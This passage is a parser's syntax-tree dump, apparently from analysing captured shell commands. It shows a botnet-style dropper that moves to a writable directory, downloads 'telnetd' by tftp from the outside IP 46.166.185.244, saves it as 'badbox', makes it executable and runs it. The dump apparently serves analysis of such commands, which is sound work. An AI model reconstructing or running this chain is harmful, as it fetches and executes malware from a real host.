    WordNode(lineno=15, pos=(1589, 1594), word='chmod'),
    WordNode(lineno=15, pos=(1595, 1597), word='+x'),
    WordNode(lineno=15, pos=(1598, 1599), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1599, 1600)),
  CommandNode(lineno=15, pos=(1600, 1608), parts=[
    WordNode(lineno=15, pos=(1600, 1608), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1609, 1738), parts=[
  CommandNode(lineno=16, pos=(1609, 1616), parts=[
    WordNode(lineno=16, pos=(1609, 1611), word='cd'),
    WordNode(lineno=16, pos=(1612, 1616), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1617, 1619)),
  CommandNode(lineno=16, pos=(1620, 1631), parts=[
    WordNode(lineno=16, pos=(1620, 1622), word='cd'),
    WordNode(lineno=16, pos=(1623, 1631), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1632, 1634)),
  CommandNode(lineno=16, pos=(1635, 1642), parts=[
    WordNode(lineno=16, pos=(1635, 1637), word='cd'),
    WordNode(lineno=16, pos=(1638, 1642), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1643, 1645)),
  CommandNode(lineno=16, pos=(1646, 1654), parts=[
    WordNode(lineno=16, pos=(1646, 1648), word='cd'),
    WordNode(lineno=16, pos=(1649, 1654), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1655, 1657)),
  CommandNode(lineno=16, pos=(1658, 1662), parts=[
    WordNode(lineno=16, pos=(1658, 1660), word='cd'),
    WordNode(lineno=16, pos=(1661, 1662), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1662, 1663)),
  CommandNode(lineno=16, pos=(1664, 1698), parts=[
    WordNode(lineno=16, pos=(1664, 1668), word='tftp'),
    WordNode(lineno=16, pos=(1669, 1683), word='46.166.185.244'),
    WordNode(lineno=16, pos=(1684, 1686), word='-c'),
    WordNode(lineno=16, pos=(1687, 1690), word='get'),
    WordNode(lineno=16, pos=(1691, 1698), word='telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1698, 1699)),
  CommandNode(lineno=16, pos=(1699, 1718), parts=[
    WordNode(lineno=16, pos=(1699, 1702), word='cat'),
    WordNode(lineno=16, pos=(1703, 1710), word='telnetd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1712, 1718), word='badbox'), pos=(1711, 1718), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1718, 1719)),
  CommandNode(lineno=16, pos=(1719, 1729), parts=[
    WordNode(lineno=16, pos=(1719, 1724), word='chmod'),
    WordNode(lineno=16, pos=(1725, 1727), word='+x'),
    WordNode(lineno=16, pos=(1728, 1729), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1729, 1730)),
  CommandNode(lineno=16, pos=(1730, 1738), parts=[
    WordNode(lineno=16, pos=(1730, 1738), word='./badbox'),
  ]),
])
